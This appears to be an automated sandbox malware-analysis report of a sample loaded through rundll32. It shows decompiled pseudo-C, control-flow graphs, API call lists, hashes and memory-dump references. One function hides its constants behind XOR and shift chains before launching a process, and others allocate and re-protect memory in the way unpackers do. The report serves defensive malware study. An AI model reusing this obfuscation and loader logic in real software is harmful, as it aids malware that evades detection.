                                                                                                                          0x0079e9c0
                                                                                                                          0x0079e9c7
                                                                                                                          0x0079e9d3
                                                                                                                          0x0079e9d8
                                                                                                                          0x0079e9dd
                                                                                                                          0x0079e9e1
                                                                                                                          0x0079e9e8
                                                                                                                          0x0079e9ef
                                                                                                                          0x0079e9f6
                                                                                                                          0x0079e9fd
                                                                                                                          0x0079ea02
                                                                                                                          0x0079ea07
                                                                                                                          0x0079ea0e
                                                                                                                          0x0079ea15
                                                                                                                          0x0079ea19
                                                                                                                          0x0079ea1a
                                                                                                                          0x0079ea1d
                                                                                                                          0x0079ea24
                                                                                                                          0x0079ea2f
                                                                                                                          0x0079ea32
                                                                                                                          0x0079ea39
                                                                                                                          0x0079ea40
                                                                                                                          0x0079ea47
                                                                                                                          0x0079ea53
                                                                                                                          0x0079ea56
                                                                                                                          0x0079ea5d
                                                                                                                          0x0079ea5d
                                                                                                                          0x0079ea60
                                                                                                                          0x0079ea65
                                                                                                                          0x0079ea77
                                                                                                                          0x0079ea88
                                                                                                                          0x0079ea8d
                                                                                                                          0x0079ea77
                                                                                                                          0x0079ea96

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID: ].u$d,
                                                                                                                          • API String ID: 621844428-1507873175
                                                                                                                          • Opcode ID: d840cdebee310378de32332cb97d476b5c1b2d7d0980ef3207748004bec7701d
                                                                                                                          • Instruction ID: ebdbae3ff9736719d60ed384afda86bfdc5e407ac562c14582305a7a902906e9
                                                                                                                          • Opcode Fuzzy Hash: d840cdebee310378de32332cb97d476b5c1b2d7d0980ef3207748004bec7701d
                                                                                                                          • Instruction Fuzzy Hash: 6B31F471D00209EBDF08DFA4D98A5EEBBF0FB54304F208199D510BB250D7B45B859F80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079AB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 288 79ab87-79ad94 call 7a20b9 call 794b61 call 797f5d 294 79ad99-79ad9e 288->294 295 79addd 294->295 296 79ada0-79ada2 294->296 297 79addf-79ade5 295->297 298 79adb0-79addb call 7a1e67 * 2 296->298 299 79ada4-79adaa 296->299 300 79adab-79adae 298->300 299->300 300->297
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E0079AB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E007A20B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E00794B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E00797F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E007A1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E007A1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                          0x0079ab88
                                                                                                                          0x0079ab94
                                                                                                                          0x0079ab97
                                                                                                                          0x0079ab9a
                                                                                                                          0x0079ab9d
                                                                                                                          0x0079ab9f
                                                                                                                          0x0079aba2
                                                                                                                          0x0079aba3
                                                                                                                          0x0079aba6
                                                                                                                          0x0079abaa
                                                                                                                          0x0079abab
                                                                                                                          0x0079abb0
                                                                                                                          0x0079abb6
                                                                                                                          0x0079abbd
                                                                                                                          0x0079abc4
                                                                                                                          0x0079abcb
                                                                                                                          0x0079abd2
                                                                                                                          0x0079abd6
                                                                                                                          0x0079abdd
                                                                                                                          0x0079abe4
                                                                                                                          0x0079abeb
                                                                                                                          0x0079abf2
                                                                                                                          0x0079abf9
                                                                                                                          0x0079ac00
                                                                                                                          0x0079ac09
                                                                                                                          0x0079ac0e
                                                                                                                          0x0079ac13
                                                                                                                          0x0079ac1a
                                                                                                                          0x0079ac21
                                                                                                                          0x0079ac28
                                                                                                                          0x0079ac2f
                                                                                                                          0x0079ac36
                                                                                                                          0x0079ac3d
                                                                                                                          0x0079ac44
                                                                                                                          0x0079ac4b
                                                                                                                          0x0079ac52
                                                                                                                          0x0079ac59
                                                                                                                          0x0079ac60
                                                                                                                          0x0079ac67
                                                                                                                          0x0079ac6e
                                                                                                                          0x0079ac75
                                                                                                                          0x0079ac79
                                                                                                                          0x0079ac80
                                                                                                                          0x0079ac87
                                                                                                                          0x0079ac8e
                                                                                                                          0x0079ac91
                                                                                                                          0x0079ac98
                                                                                                                          0x0079ac9f
                                                                                                                          0x0079aca3
                                                                                                                          0x0079acaa
                                                                                                                          0x0079acb1
                                                                                                                          0x0079acb8
                                                                                                                          0x0079acbc
                                                                                                                          0x0079acc3
                                                                                                                          0x0079acca
                                                                                                                          0x0079accd
                                                                                                                          0x0079acd4
                                                                                                                          0x0079acdb
                                                                                                                          0x0079ace2
                                                                                                                          0x0079ace9
                                                                                                                          0x0079aced
                                                                                                                          0x0079acf4
                                                                                                                          0x0079acfb
                                                                                                                          0x0079ad05
                                                                                                                          0x0079ad08
                                                                                                                          0x0079ad0b
                                                                                                                          0x0079ad16
                                                                                                                          0x0079ad19
                                                                                                                          0x0079ad20
                                                                                                                          0x0079ad2c
                                                                                                                          0x0079ad31
                                                                                                                          0x0079ad31
                                                                                                                          0x0079ad34
                                                                                                                          0x0079ad37
                                                                                                                          0x0079ad3e
                                                                                                                          0x0079ad45
                                                                                                                          0x0079ad4c
                                                                                                                          0x0079ad50
                                                                                                                          0x0079ad57
                                                                                                                          0x0079ad5a
                                                                                                                          0x0079ad5f
                                                                                                                          0x0079ad62
                                                                                                                          0x0079ad6a
                                                                                                                          0x0079ad6d
                                                                                                                          0x0079ad74
                                                                                                                          0x0079ad94
                                                                                                                          0x0079ad9e
                                                                                                                          0x0079addd
                                                                                                                          0x0079ada0
                                                                                                                          0x0079ada2
                                                                                                                          0x0079adbf
                                                                                                                          0x0079add3
                                                                                                                          0x0079ada4
                                                                                                                          0x0079ada7
                                                                                                                          0x0079ada8
                                                                                                                          0x0079ada9
                                                                                                                          0x0079adaa
                                                                                                                          0x0079adaa
                                                                                                                          0x0079adad
                                                                                                                          0x0079adad
                                                                                                                          0x0079ade5

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID: nJQ
                                                                                                                          • API String ID: 963392458-2884827605
                                                                                                                          • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                          • Instruction ID: 836d03d4b16704169ad780032871f3b1473072ce1fa1b1b4266b9b91947d41f8
                                                                                                                          • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                          • Instruction Fuzzy Hash: D471F272500288EBCF59CFA4D9498CE3BA2FF48358F108119FE1696224D3B6C969DF85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                          APIs
                                                                                                                          • _malloc.LIBCMT ref: 10006A9C
                                                                                                                            • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                            • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                            • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 501242067-0
                                                                                                                          • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                          • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                          • GlobalHandle.KERNEL32(00247AB8), ref: 100208A9
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                          • GlobalHandle.KERNEL32(00247AB8), ref: 100208DB
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                          • _memset.LIBCMT ref: 10020911
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 496899490-0
                                                                                                                          • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                          • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 1002FA87
                                                                                                                            • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                            • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                            • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                          • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                          • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714421763-0
                                                                                                                          • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                          • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                          • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                          • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                          • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                          • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3296620671-0
                                                                                                                          • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                          • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 252 10001a2c-10001a4e VirtualAlloc 250->252 253 10001a7e 250->253 255 10001a50-10001a52 252->255 256 10001a57-10001a7b call 100017c0 252->256 253->246 255->251 256->253 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
